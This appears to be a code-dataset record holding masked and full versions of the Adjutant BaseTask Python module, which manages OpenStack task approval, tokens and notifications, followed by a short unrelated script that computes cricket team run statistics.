self.task.approved and not approved:\n raise exceptions.TaskStateInvalid(self.task,\n 'This task has already been approved.')\n if not self.task.approved and approved:\n raise exceptions.TaskStateInvalid(self.task,\n 'This task has not been approved.')\n\n def update(self, action_data):\n self.confirm_state(approved=False, completed=False, cancelled=False)\n action_serializer_list = self._instantiate_action_serializers(\n action_data, use_existing_actions=True)\n hash_key = self._create_task_hash(action_serializer_list)\n self._handle_duplicates(hash_key)\n for action in action_serializer_list:\n data = action['serializer'].validated_data\n action['action'].action.action_data = data\n action['action'].action.save()\n self._refresh_actions()\n self.prepare()\n <mask token>\n\n def approve(self, approved_by='system'):\n \"\"\"Run the approve stage for all the actions.\"\"\"\n self.confirm_state(completed=False, cancelled=False)\n self.is_valid('task invalid before approval')\n self.task.approved = True\n self.task.approved_on = timezone.now()\n self.task.approved_by = approved_by\n self.task.save()\n for action in self.actions:\n try:\n action.approve()\n except Exception as e:\n handle_task_error(e, self.task, error_text=\n 'while approving task')\n self.is_valid('task invalid after approval')\n need_token = any([act.need_token for act in self.actions])\n if need_token:\n self._create_token()\n else:\n self.submit()\n\n def reissue_token(self):\n self.confirm_state(approved=True, completed=False, cancelled=False)\n need_token = any([act.need_token for act in self.actions])\n if need_token:\n self._create_token()\n\n def clear_tokens(self):\n for token in self.task.tokens:\n token.delete()\n\n def submit(self, token_data=None, keystone_user=None):\n self.confirm_state(approved=True, completed=False, cancelled=False)\n required_fields = set()\n actions = []\n for action in self.task.actions:\n a = action.get_action()\n actions.append(a)\n for field in a.token_fields:\n required_fields.add(field)\n if not token_data:\n token_data = {}\n errors = {}\n data = {}\n for field in required_fields:\n try:\n data[field] = token_data[field]\n except KeyError:\n errors[field] = ['This field is required.']\n except TypeError:\n errors = [\n 'Improperly formated json. Should be a key-value object.']\n break\n if errors:\n raise exceptions.TaskTokenSerializersInvalid(self.task, errors)\n self.is_valid('task invalid before submit')\n for action in actions:\n try:\n action.submit(data, keystone_user)\n except Exception as e:\n handle_task_error(e, self.task, 'while submiting task')\n self.is_valid('task invalid after submit')\n self.task.completed = True\n self.task.completed_on = timezone.now()\n self.task.save()\n for token in self.task.tokens:\n token.delete()\n email_conf = self.config.emails.completed\n send_stage_email(self.task, email_conf)\n <mask token>\n", "step-3": "<mask token>\n\n\nclass BaseTask(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, task_model=None, task_data=None, action_data=None):\n self._config = None\n self.logger = getLogger('adjutant')\n if task_model:\n self.task = task_model\n self._refresh_actions()\n else:\n action_serializer_list = self._instantiate_action_serializers(\n action_data)\n hash_key = self._create_task_hash(action_serializer_list)\n self._handle_duplicates(hash_key)\n keystone_user = task_data.get('keystone_user', {})\n self.task = Task.objects.create(keystone_user=keystone_user,\n project_id=keystone_user.get('project_id'), task_type=self.\n task_type, hash_key=hash_key)\n self.task.save()\n self.actions = []\n for i, action in enumerate(action_serializer_list):\n data = action['serializer'].validated_data\n self.actions.append(action['action'](data=data, task=self.\n task, order=i))\n self.logger.info(\"(%s) - '%s' task created (%s).\" % (timezone.\n now(), self.task_type, self.task.uuid))\n <mask token>\n\n def _create_task_hash(self, action_list):\n hashable_list = [self.task_type]\n for action in action_list:\n hashable_list.append(action['name'])\n if not action['serializer']:\n continue\n fields = sorted(action['serializer'].validated_data.keys())\n for field in fields:\n try:\n hashable_list.append(action['serializer'].\n validated_data[field])\n except KeyError:\n if field == 'username' and CONF.identity.username_is_email:\n continue\n else:\n raise\n return hashlib.sha256(str(hashable_list).encode('utf-8')).hexdigest()\n\n def _handle_duplicates(self, hash_key):\n duplicate_tasks = Task.objects.filter(hash_key=hash_key, completed=\n 0, cancelled=0)\n if not duplicate_tasks:\n return\n if self.duplicate_policy == 'cancel':\n now = timezone.now()\n self.logger.info(\n '(%s) - Task is a duplicate - Cancelling old tasks.' % now)\n for task in duplicate_tasks:\n task.add_task_note(\n 'Task cancelled because was an old duplicate. - (%s)' % now\n )\n task.get_task().cancel()\n return\n raise exceptions.TaskDuplicateFound()\n\n def _refresh_actions(self):\n self.actions = [a.get_action() for a in self.task.actions]\n\n def _create_token(self):\n self.clear_tokens()\n token_expiry = self.config.token_expiry or self.token_expiry\n token = create_token(self.task, token_expiry)\n self.add_note('Token created for task.')\n try:\n email_conf = self.config.emails.token\n send_stage_email(self.task, email_conf, token)\n except KeyError as e:\n handle_task_error(e, self.task, error_text='while sending token')\n\n def add_note(self, note):\n \"\"\"\n Logs the note, and also adds it to the task notes.\n \"\"\"\n now = timezone.now()\n self.logger.info('(%s)(%s)(%s) - %s' % (now, self.task_type, self.\n task.uuid, note))\n note = '%s - (%s)' % (note, now)\n self.task.add_task_note(note)\n\n @property\n def config(self):\n \"\"\"Get my config.\n\n Returns a dict of the config for this task.\n \"\"\"\n if self._config is None:\n try:\n task_conf = CONF.workflow.tasks[self.task_type]\n except KeyError:\n task_conf = {}\n self._config = CONF.workflow.task_defaults.overlay(task_conf)\n return self._config\n\n def is_valid(self, internal_message=None):\n self._refresh_actions()\n valid = all([act.valid for act in self.actions])\n if not valid:\n raise exceptions.TaskActionsInvalid(self.task,\n 'actions invalid', internal_message)\n\n @property\n def approved(self):\n return self.task.approved\n\n @property\n def completed(self):\n return self.task.completed\n\n @property\n def cancelled(self):\n return self.task.cancelled\n\n def confirm_state(self, approved=None, completed=None, cancelled=None):\n \"\"\"Check that the Task is in a given state.\n\n None value means state is ignored. Otherwise expects true or false.\n \"\"\"\n if completed is not None:\n if self.task.completed and not completed:\n raise exceptions.TaskStateInvalid(self.task,\n 'This task has already been completed.')\n if not self.task.completed and completed:\n raise exceptions.TaskStateInvalid(self.task,\n \"This task hasn't been completed.\")\n if cancelled is not None:\n if self.task.cancelled and not cancelled:\n raise exceptions.TaskStateInvalid(self.task,\n 'This task has been cancelled.')\n if not self.task.cancelled and cancelled:\n raise exceptions.TaskStateInvalid(self.task,\n 'This task has not been cancelled.')\n if approved is not None:\n if self.task.approved and not approved:\n raise exceptions.TaskStateInvalid(self.task,\n 'This task has already been approved.')\n if not self.task.approved and approved:\n raise exceptions.TaskStateInvalid(self.task,\n 'This task has not been approved.')\n\n def update(self, action_data):\n self.confirm_state(approved=False, completed=False, cancelled=False)\n action_serializer_list = self._instantiate_action_serializers(\n action_data, use_existing_actions=True)\n hash_key = self._create_task_hash(action_serializer_list)\n self._handle_duplicates(hash_key)\n for action in action_serializer_list:\n data = action['serializer'].validated_data\n action['action'].action.action_data = data\n action['action'].action.save()\n self._refresh_actions()\n self.prepare()\n <mask token>\n\n def approve(self, approved_by='system'):\n \"\"\"Run the approve stage for all the actions.\"\"\"\n self.confirm_state(completed=False, cancelled=False)\n self.is_valid('task invalid before approval')\n self.task.approved = True\n self.task.approved_on = timezone.now()\n self.task.approved_by = approved_by\n self.task.save()\n for action in self.actions:\n try:\n action.approve()\n except Exception as e:\n handle_task_error(e, self.task, error_text=\n 'while approving task')\n self.is_valid('task invalid after approval')\n need_token = any([act.need_token for act in self.actions])\n if need_token:\n self._create_token()\n else:\n self.submit()\n\n def reissue_token(self):\n self.confirm_state(approved=True, completed=False, cancelled=False)\n need_token = any([act.need_token for act in self.actions])\n if need_token:\n self._create_token()\n\n def clear_tokens(self):\n for token in self.task.tokens:\n token.delete()\n\n def submit(self, token_data=None, keystone_user=None):\n self.confirm_state(approved=True, completed=False, cancelled=False)\n required_fields = set()\n actions = []\n for action in self.task.actions:\n a = action.get_action()\n actions.append(a)\n for field in a.token_fields:\n required_fields.add(field)\n if not token_data:\n token_data = {}\n errors = {}\n data = {}\n for field in required_fields:\n try:\n data[field] = token_data[field]\n except KeyError:\n errors[field] = ['This field is required.']\n except TypeError:\n errors = [\n 'Improperly formated json. Should be a key-value object.']\n break\n if errors:\n raise exceptions.TaskTokenSerializersInvalid(self.task, errors)\n self.is_valid('task invalid before submit')\n for action in actions:\n try:\n action.submit(data, keystone_user)\n except Exception as e:\n handle_task_error(e, self.task, 'while submiting task')\n self.is_valid('task invalid after submit')\n self.task.completed = True\n self.task.completed_on = timezone.now()\n self.task.save()\n for token in self.task.tokens:\n token.delete()\n email_conf = self.config.emails.completed\n send_stage_email(self.task, email_conf)\n <mask token>\n", "step-4": "<mask token>\n\n\nclass BaseTask(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, task_model=None, task_data=None, action_data=None):\n self._config = None\n self.logger = getLogger('adjutant')\n if task_model:\n self.task = task_model\n self._refresh_actions()\n else:\n action_serializer_list = self._instantiate_action_serializers(\n action_data)\n hash_key = self._create_task_hash(action_serializer_list)\n self._handle_duplicates(hash_key)\n keystone_user = task_data.get('keystone_user', {})\n self.task = Task.objects.create(keystone_user=keystone_user,\n project_id=keystone_user.get('project_id'), task_type=self.\n task_type, hash_key=hash_key)\n self.task.save()\n self.actions = []\n for i, action in enumerate(action_serializer_list):\n data = action['serializer'].validated_data\n self.actions.append(action['action'](data=data, task=self.\n task, order=i))\n self.logger.info(\"(%s) - '%s' task created (%s).\" % (timezone.\n now(), self.task_type, self.task.uuid))\n\n def _instantiate_action_serializers(self, action_data,\n use_existing_actions=False):\n action_serializer_list = []\n if use_existing_actions:\n actions = self.actions\n else:\n actions = self.default_actions[:]\n actions += self.config.additional_actions\n valid = True\n for action in actions:\n if use_existing_actions:\n action_name = action.action.action_name\n else:\n action_name = action\n action_class = adj_actions.ACTION_CLASSES[action_name]\n if use_existing_actions:\n action_class = action\n if not action_class.serializer:\n raise exceptions.SerializerMissingException(\n 'No serializer defined for action %s' % action_name)\n serializer = action_class.serializer(data=action_data)\n action_serializer_list.append({'name': action_name, 'action':\n action_class, 'serializer': serializer})\n if serializer and not serializer.is_valid():\n valid = False\n if not valid:\n errors = {}\n for action in action_serializer_list:\n if action['serializer']:\n errors.update(action['serializer'].errors)\n raise exceptions.TaskSerializersInvalid(errors)\n return action_serializer_list\n\n def _create_task_hash(self, action_list):\n hashable_list = [self.task_type]\n for action in action_list:\n hashable_list.append(action['name'])\n if not action['serializer']:\n continue\n fields = sorted(action['serializer'].validated_data.keys())\n for field in fields:\n try:\n hashable_list.append(action['serializer'].\n validated_data[field])\n except KeyError:\n if field == 'username' and CONF.identity.username_is_email:\n continue\n else:\n raise\n return hashlib.sha256(str(hashable_list).encode('utf-8')).hexdigest()\n\n def _handle_duplicates(self, hash_key):\n duplicate_tasks = Task.objects.filter(hash_key=hash_key, completed=\n 0, cancelled=0)\n if not duplicate_tasks:\n return\n if self.duplicate_policy == 'cancel':\n now = timezone.now()\n self.logger.info(\n '(%s) - Task is a duplicate - Cancelling old tasks.' % now)\n for task in duplicate_tasks:\n task.add_task_note(\n 'Task cancelled because was an old duplicate. - (%s)' % now\n )\n task.get_task().cancel()\n return\n raise exceptions.TaskDuplicateFound()\n\n def _refresh_actions(self):\n self.actions = [a.get_action() for a in self.task.actions]\n\n def _create_token(self):\n self.clear_tokens()\n token_expiry = self.config.token_expiry or self.token_expiry\n token = create_token(self.task, token_expiry)\n self.add_note('Token created for task.')\n try:\n email_conf = self.config.emails.token\n send_stage_email(self.task, email_conf, token)\n except KeyError as e:\n handle_task_error(e, self.task, error_text='while sending token')\n\n def add_note(self, note):\n \"\"\"\n Logs the note, and also adds it to the task notes.\n \"\"\"\n now = timezone.now()\n self.logger.info('(%s)(%s)(%s) - %s' % (now, self.task_type, self.\n task.uuid, note))\n note = '%s - (%s)' % (note, now)\n self.task.add_task_note(note)\n\n @property\n def config(self):\n \"\"\"Get my config.\n\n Returns a dict of the config for this task.\n \"\"\"\n if self._config is None:\n try:\n task_conf = CONF.workflow.tasks[self.task_type]\n except KeyError:\n task_conf = {}\n self._config = CONF.workflow.task_defaults.overlay(task_conf)\n return self._config\n\n def is_valid(self, internal_message=None):\n self._refresh_actions()\n valid = all([act.valid for act in self.actions])\n if not valid:\n raise exceptions.TaskActionsInvalid(self.task,\n 'actions invalid', internal_message)\n\n @property\n def approved(self):\n return self.task.approved\n\n @property\n def completed(self):\n return self.task.completed\n\n @property\n def cancelled(self):\n return self.task.cancelled\n\n def confirm_state(self, approved=None, completed=None, cancelled=None):\n \"\"\"Check that the Task is in a given state.\n\n None value means state is ignored. Otherwise expects true or false.\n \"\"\"\n if completed is not None:\n if self.task.completed and not completed:\n raise exceptions.TaskStateInvalid(self.task,\n 'This task has already been completed.')\n if not self.task.completed and completed:\n raise exceptions.TaskStateInvalid(self.task,\n \"This task hasn't been completed.\")\n if cancelled is not None:\n if self.task.cancelled and not cancelled:\n raise exceptions.TaskStateInvalid(self.task,\n 'This task has been cancelled.')\n if not self.task.cancelled and cancelled:\n raise exceptions.TaskStateInvalid(self.task,\n 'This task has not been cancelled.')\n if approved is not None:\n if self.task.approved and not approved:\n raise exceptions.TaskStateInvalid(self.task,\n 'This task has already been approved.')\n if not self.task.approved and approved:\n raise exceptions.TaskStateInvalid(self.task,\n 'This task has not been approved.')\n\n def update(self, action_data):\n self.confirm_state(approved=False, completed=False, cancelled=False)\n action_serializer_list = self._instantiate_action_serializers(\n action_data, use_existing_actions=True)\n hash_key = self._create_task_hash(action_serializer_list)\n self._handle_duplicates(hash_key)\n for action in action_serializer_list:\n data = action['serializer'].validated_data\n action['action'].action.action_data = data\n action['action'].action.save()\n self._refresh_actions()\n self.prepare()\n\n def prepare(self):\n \"\"\"Run the prepare stage for all the actions.\n\n If the task can be auto approved, this will also run the approve\n stage.\n \"\"\"\n self.confirm_state(approved=False, completed=False, cancelled=False)\n for action in self.actions:\n try:\n action.prepare()\n except Exception as e:\n handle_task_error(e, self.task, error_text=\n 'while setting up task')\n email_conf = self.config.emails.initial\n send_stage_email(self.task, email_conf)\n approve_list = [act.auto_approve for act in self.actions]\n if False in approve_list:\n can_auto_approve = False\n elif True in approve_list:\n can_auto_approve = True\n else:\n can_auto_approve = False\n if self.config.allow_auto_approve is not None:\n allow_auto_approve = self.config.allow_auto_approve\n else:\n allow_auto_approve = self.allow_auto_approve\n if can_auto_approve and not allow_auto_approve:\n self.add_note('Actions allow auto aproval, but task does not.')\n elif can_auto_approve:\n self.add_note('Action allow auto approval. Auto approving.')\n self.approve()\n return\n if self.send_approval_notification:\n notes = {'notes': [\"'%s' task needs approval.\" % self.task_type]}\n create_notification(self.task, notes)\n\n def approve(self, approved_by='system'):\n \"\"\"Run the approve stage for all the actions.\"\"\"\n self.confirm_state(completed=False, cancelled=False)\n self.is_valid('task invalid before approval')\n self.task.approved = True\n self.task.approved_on = timezone.now()\n self.task.approved_by = approved_by\n self.task.save()\n for action in self.actions:\n try:\n action.approve()\n except Exception as e:\n handle_task_error(e, self.task, error_text=\n 'while approving task')\n self.is_valid('task invalid after approval')\n need_token = any([act.need_token for act in self.actions])\n if need_token:\n self._create_token()\n else:\n self.submit()\n\n def reissue_token(self):\n self.confirm_state(approved=True, completed=False, cancelled=False)\n need_token = any([act.need_token for act in self.actions])\n if need_token:\n self._create_token()\n\n def clear_tokens(self):\n for token in self.task.tokens:\n token.delete()\n\n def submit(self, token_data=None, keystone_user=None):\n self.confirm_state(approved=True, completed=False, cancelled=False)\n required_fields = set()\n actions = []\n for action in self.task.actions:\n a = action.get_action()\n actions.append(a)\n for field in a.token_fields:\n required_fields.add(field)\n if not token_data:\n token_data = {}\n errors = {}\n data = {}\n for field in required_fields:\n try:\n data[field] = token_data[field]\n except KeyError:\n errors[field] = ['This field is required.']\n except TypeError:\n errors = [\n 'Improperly formated json. Should be a key-value object.']\n break\n if errors:\n raise exceptions.TaskTokenSerializersInvalid(self.task, errors)\n self.is_valid('task invalid before submit')\n for action in actions:\n try:\n action.submit(data, keystone_user)\n except Exception as e:\n handle_task_error(e, self.task, 'while submiting task')\n self.is_valid('task invalid after submit')\n self.task.completed = True\n self.task.completed_on = timezone.now()\n self.task.save()\n for token in self.task.tokens:\n token.delete()\n email_conf = self.config.emails.completed\n send_stage_email(self.task, email_conf)\n <mask token>\n", "step-5": "# Copyright (C) 2019 Catalyst Cloud Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport hashlib\nfrom logging import getLogger\n\nfrom confspirator import groups\nfrom confspirator import fields\n\nfrom adjutant import actions as adj_actions\nfrom adjutant.api.models import Task\nfrom adjutant.config import CONF\nfrom django.utils import timezone\nfrom adjutant.notifications.utils import create_notification\nfrom adjutant.tasks.v1.utils import send_stage_email, create_token, handle_task_error\nfrom adjutant import exceptions\n\n\ndef make_task_config(task_class):\n config_group = groups.DynamicNameConfigGroup()\n config_group.register_child_config(\n fields.BoolConfig(\n \"allow_auto_approve\",\n help_text=\"Override if this task allows auto_approval. \"\n \"Otherwise uses task default.\",\n default=task_class.allow_auto_approve,\n )\n )\n config_group.register_child_config(\n fields.ListConfig(\n \"additional_actions\",\n help_text=\"Additional actions to be run as part of the task \"\n \"after default actions.\",\n default=task_class.additional_actions or [],\n )\n )\n config_group.register_child_config(\n fields.IntConfig(\n \"token_expiry\",\n help_text=\"Override for the task token expiry. \"\n \"Otherwise uses task default.\",\n default=task_class.token_expiry,\n )\n )\n config_group.register_child_config(\n fields.DictConfig(\n \"actions\",\n help_text=\"Action config overrides over the action defaults. \"\n \"See 'adjutant.workflow.action_defaults'.\",\n is_json=True,\n default=task_class.action_config or {},\n sample_default={\n \"SomeCustomAction\": {\"some_action_setting\": \"<a-uuid-probably>\"}\n },\n )\n )\n config_group.register_child_config(\n fields.DictConfig(\n \"emails\",\n help_text=\"Email config overrides for this task over task defaults.\"\n \"See 'adjutant.workflow.emails'.\",\n is_json=True,\n default=task_class.email_config or {},\n sample_default={\n \"initial\": None,\n \"token\": {\n \"subject\": \"Some custom subject\",\n },\n },\n )\n )\n config_group.register_child_config(\n fields.DictConfig(\n \"notifications\",\n help_text=\"Notification config overrides for this task over task defaults.\"\n \"See 'adjutant.workflow.notifications'.\",\n is_json=True,\n default=task_class.notification_config or {},\n sample_default={\n \"standard_handlers\": [\"EmailNotification\"],\n \"error_handlers\": [\"EmailNotification\"],\n \"standard_handler_config\": {\n \"EmailNotification\": {\n \"emails\": [\"[email protected]\"],\n \"reply\": \"[email protected]\",\n }\n },\n \"error_handler_config\": {\n \"EmailNotification\": {\n \"emails\": [\"[email protected]\"],\n \"reply\": \"[email protected]\",\n }\n },\n },\n )\n )\n return config_group\n\n\nclass BaseTask(object):\n \"\"\"\n Base class for in memory task representation.\n\n This serves as the internal task logic handler, and is used to\n define what a task looks like.\n\n Most of the time this class shouldn't be called or used directly\n as the task manager is what handles the direct interaction to the\n logic here, and includes some wrapper logic to help deal with workflows.\n \"\"\"\n\n # required values in custom task\n task_type = None\n default_actions = None\n\n # default values to optionally override in task definition\n deprecated_task_types = None\n duplicate_policy = \"cancel\"\n send_approval_notification = True\n token_requires_authentication = False\n\n # config defaults for the task (used to generate default config):\n allow_auto_approve = True\n additional_actions = None\n token_expiry = None\n action_config = None\n email_config = None\n notification_config = None\n\n def __init__(self, task_model=None, task_data=None, action_data=None):\n self._config = None\n self.logger = getLogger(\"adjutant\")\n\n if task_model:\n self.task = task_model\n self._refresh_actions()\n else:\n # raises 400 validation error\n action_serializer_list = self._instantiate_action_serializers(action_data)\n\n hash_key = self._create_task_hash(action_serializer_list)\n # raises duplicate error\n self._handle_duplicates(hash_key)\n\n keystone_user = task_data.get(\"keystone_user\", {})\n self.task = Task.objects.create(\n keystone_user=keystone_user,\n project_id=keystone_user.get(\"project_id\"),\n task_type=self.task_type,\n hash_key=hash_key,\n )\n self.task.save()\n\n # Instantiate actions with serializers\n self.actions = []\n for i, action in enumerate(action_serializer_list):\n data = action[\"serializer\"].validated_data\n\n # construct the action class\n self.actions.append(\n action[\"action\"](data=data, task=self.task, order=i)\n )\n self.logger.info(\n \"(%s) - '%s' task created (%s).\"\n % (timezone.now(), self.task_type, self.task.uuid)\n )\n\n def _instantiate_action_serializers(self, action_data, use_existing_actions=False):\n action_serializer_list = []\n\n if use_existing_actions:\n actions = self.actions\n else:\n actions = self.default_actions[:]\n actions += self.config.additional_actions\n\n # instantiate all action serializers and check validity\n valid = True\n for action in actions:\n if use_existing_actions:\n action_name = action.action.action_name\n else:\n action_name = action\n\n action_class = adj_actions.ACTION_CLASSES[action_name]\n\n if use_existing_actions:\n action_class = action\n\n # instantiate serializer class\n if not action_class.serializer:\n raise exceptions.SerializerMissingException(\n \"No serializer defined for action %s\" % action_name\n )\n serializer = action_class.serializer(data=action_data)\n\n action_serializer_list.append(\n {\"name\": action_name, \"action\": action_class, \"serializer\": serializer}\n )\n\n if serializer and not serializer.is_valid():\n valid = False\n\n if not valid:\n errors = {}\n for action in action_serializer_list:\n if action[\"serializer\"]:\n errors.update(action[\"serializer\"].errors)\n raise exceptions.TaskSerializersInvalid(errors)\n\n return action_serializer_list\n\n def _create_task_hash(self, action_list):\n hashable_list = [\n self.task_type,\n ]\n\n for action in action_list:\n hashable_list.append(action[\"name\"])\n if not action[\"serializer\"]:\n continue\n # iterate like this to maintain consistent order for hash\n fields = sorted(action[\"serializer\"].validated_data.keys())\n for field in fields:\n try:\n hashable_list.append(action[\"serializer\"].validated_data[field])\n except KeyError:\n if field == \"username\" and CONF.identity.username_is_email:\n continue\n else:\n raise\n\n return hashlib.sha256(str(hashable_list).encode(\"utf-8\")).hexdigest()\n\n def _handle_duplicates(self, hash_key):\n duplicate_tasks = Task.objects.filter(\n hash_key=hash_key, completed=0, cancelled=0\n )\n\n if not duplicate_tasks:\n return\n\n if self.duplicate_policy == \"cancel\":\n now = timezone.now()\n self.logger.info(\"(%s) - Task is a duplicate - Cancelling old tasks.\" % now)\n for task in duplicate_tasks:\n task.add_task_note(\n \"Task cancelled because was an old duplicate. - (%s)\" % now\n )\n task.get_task().cancel()\n return\n\n raise exceptions.TaskDuplicateFound()\n\n def _refresh_actions(self):\n self.actions = [a.get_action() for a in self.task.actions]\n\n def _create_token(self):\n self.clear_tokens()\n token_expiry = self.config.token_expiry or self.token_expiry\n token = create_token(self.task, token_expiry)\n self.add_note(\"Token created for task.\")\n try:\n # will throw a key error if the token template has not\n # been specified\n email_conf = self.config.emails.token\n send_stage_email(self.task, email_conf, token)\n except KeyError as e:\n handle_task_error(e, self.task, error_text=\"while sending token\")\n\n def add_note(self, note):\n \"\"\"\n Logs the note, and also adds it to the task notes.\n \"\"\"\n now = timezone.now()\n self.logger.info(\n \"(%s)(%s)(%s) - %s\" % (now, self.task_type, self.task.uuid, note)\n )\n note = \"%s - (%s)\" % (note, now)\n self.task.add_task_note(note)\n\n @property\n def config(self):\n \"\"\"Get my config.\n\n Returns a dict of the config for this task.\n \"\"\"\n if self._config is None:\n try:\n task_conf = CONF.workflow.tasks[self.task_type]\n except KeyError:\n task_conf = {}\n self._config = CONF.workflow.task_defaults.overlay(task_conf)\n return self._config\n\n def is_valid(self, internal_message=None):\n self._refresh_actions()\n valid = all([act.valid for act in self.actions])\n if not valid:\n # TODO(amelia): get action invalidation reasons and raise those\n raise exceptions.TaskActionsInvalid(\n self.task, \"actions invalid\", internal_message\n )\n\n @property\n def approved(self):\n return self.task.approved\n\n @property\n def completed(self):\n return self.task.completed\n\n @property\n def cancelled(self):\n return self.task.cancelled\n\n def confirm_state(self, approved=None, completed=None, cancelled=None):\n \"\"\"Check that the Task is in a given state.\n\n None value means state is ignored. Otherwise expects true or false.\n \"\"\"\n if completed is not None:\n if self.task.completed and not completed:\n raise exceptions.TaskStateInvalid(\n self.task, \"This task has already been completed.\"\n )\n if not self.task.completed and completed:\n raise exceptions.TaskStateInvalid(\n self.task, \"This task hasn't been completed.\"\n )\n\n if cancelled is not None:\n if self.task.cancelled and not cancelled:\n raise exceptions.TaskStateInvalid(\n self.task, \"This task has been cancelled.\"\n )\n if not self.task.cancelled and cancelled:\n raise exceptions.TaskStateInvalid(\n self.task, \"This task has not been cancelled.\"\n )\n if approved is not None:\n if self.task.approved and not approved:\n raise exceptions.TaskStateInvalid(\n self.task, \"This task has already been approved.\"\n )\n if not self.task.approved and approved:\n raise exceptions.TaskStateInvalid(\n self.task, \"This task has not been approved.\"\n )\n\n def update(self, action_data):\n self.confirm_state(approved=False, completed=False, cancelled=False)\n\n action_serializer_list = self._instantiate_action_serializers(\n action_data, use_existing_actions=True\n )\n\n hash_key = self._create_task_hash(action_serializer_list)\n self._handle_duplicates(hash_key)\n\n for action in action_serializer_list:\n data = action[\"serializer\"].validated_data\n\n action[\"action\"].action.action_data = data\n action[\"action\"].action.save()\n self._refresh_actions()\n self.prepare()\n\n def prepare(self):\n \"\"\"Run the prepare stage for all the actions.\n\n If the task can be auto approved, this will also run the approve\n stage.\n \"\"\"\n\n self.confirm_state(approved=False, completed=False, cancelled=False)\n\n for action in self.actions:\n try:\n action.prepare()\n except Exception as e:\n handle_task_error(e, self.task, error_text=\"while setting up task\")\n\n # send initial confirmation email:\n email_conf = self.config.emails.initial\n send_stage_email(self.task, email_conf)\n\n approve_list = [act.auto_approve for act in self.actions]\n\n # TODO(amelia): It would be nice to explicitly test this, however\n # currently we don't have the right combinations of\n # actions to allow for it.\n if False in approve_list:\n can_auto_approve = False\n elif True in approve_list:\n can_auto_approve = True\n else:\n can_auto_approve = False\n\n if self.config.allow_auto_approve is not None:\n allow_auto_approve = self.config.allow_auto_approve\n else:\n allow_auto_approve = self.allow_auto_approve\n\n if can_auto_approve and not allow_auto_approve:\n self.add_note(\"Actions allow auto aproval, but task does not.\")\n elif can_auto_approve:\n self.add_note(\"Action allow auto approval. Auto approving.\")\n self.approve()\n return\n\n if self.send_approval_notification:\n notes = {\"notes\": [\"'%s' task needs approval.\" % self.task_type]}\n create_notification(self.task, notes)\n\n def approve(self, approved_by=\"system\"):\n \"\"\"Run the approve stage for all the actions.\"\"\"\n\n self.confirm_state(completed=False, cancelled=False)\n\n self.is_valid(\"task invalid before approval\")\n\n # We approve the task before running actions,\n # that way if something goes wrong we know if it was approved,\n # when it was approved, and who approved it.\n self.task.approved = True\n self.task.approved_on = timezone.now()\n self.task.approved_by = approved_by\n self.task.save()\n\n # approve all actions\n for action in self.actions:\n try:\n action.approve()\n except Exception as e:\n handle_task_error(e, self.task, error_text=\"while approving task\")\n\n self.is_valid(\"task invalid after approval\")\n\n need_token = any([act.need_token for act in self.actions])\n if need_token:\n self._create_token()\n else:\n self.submit()\n\n def reissue_token(self):\n self.confirm_state(approved=True, completed=False, cancelled=False)\n\n need_token = any([act.need_token for act in self.actions])\n if need_token:\n self._create_token()\n\n def clear_tokens(self):\n for token in self.task.tokens:\n token.delete()\n\n def submit(self, token_data=None, keystone_user=None):\n self.confirm_state(approved=True, completed=False, cancelled=False)\n\n required_fields = set()\n actions = []\n for action in self.task.actions:\n a = action.get_action()\n actions.append(a)\n for field in a.token_fields:\n required_fields.add(field)\n\n if not token_data:\n token_data = {}\n\n errors = {}\n data = {}\n\n for field in required_fields:\n try:\n data[field] = token_data[field]\n except KeyError:\n errors[field] = [\n \"This field is required.\",\n ]\n except TypeError:\n errors = [\"Improperly formated json. \" \"Should be a key-value object.\"]\n break\n\n if errors:\n raise exceptions.TaskTokenSerializersInvalid(self.task, errors)\n\n self.is_valid(\"task invalid before submit\")\n\n for action in actions:\n try:\n action.submit(data, keystone_user)\n except Exception as e:\n handle_task_error(e, self.task, \"while submiting task\")\n\n self.is_valid(\"task invalid after submit\")\n\n self.task.completed = True\n self.task.completed_on = timezone.now()\n self.task.save()\n for token in self.task.tokens:\n token.delete()\n\n # Sending confirmation email:\n email_conf = self.config.emails.completed\n send_stage_email(self.task, email_conf)\n\n def cancel(self):\n self.confirm_state(completed=False, cancelled=False)\n self.clear_tokens()\n self.task.cancelled = True\n self.task.save()\n", "step-ids": [ 14, 17, 18, 20, 26 ] }
[ 14, 17, 18, 20, 26 ]
run=[] #Creating a empty list no_players=int(input("enter the number of the players in the team :")) for i in range (no_players): run_score=int(input("Enter the runs scored by the player "+str(i+1)+":")) run.append(run_score) #code for the average score of the team def average(run): print("____________________________________") sum=0 for i in range (0,len(run)): sum+=run[i] avg=sum/len(run) print("Average score of the team is :",avg) #code for the maximun runs scored by the players in the team def high(run): print("______________________________________") max=run[0] for i in range(len(run)): if max<run[i]: max=run[i] print("Highest run score by the player is :",max) #code for the minimum runs scored by the players in the team def low(run): print("____________________________________") mim=run[0] for i in range(len(run)): if mim>run[i]: mim=run[i] print("Lowest runs scored by the player is :",mim) #code for the runs scored more than 50 runs in the the team def check(run): print("_______________________________________") count=0 for i in range(0,len(run)): if run[i]>=50: count+=1 else: pass print("Count of the player score more than '50' are :",count) #code for the runs scored for higher number of the frequency def feq(run): print("___________________________________") max=0 result=run[0] for i in run: freq=run.count(i) if freq>max: max=freq result=i print(f"run scored with the highest frequncy {result} is",max) print("-------------'THANKYOU---------------") average(run) high(run) low(run) check(run) feq(run)
normal
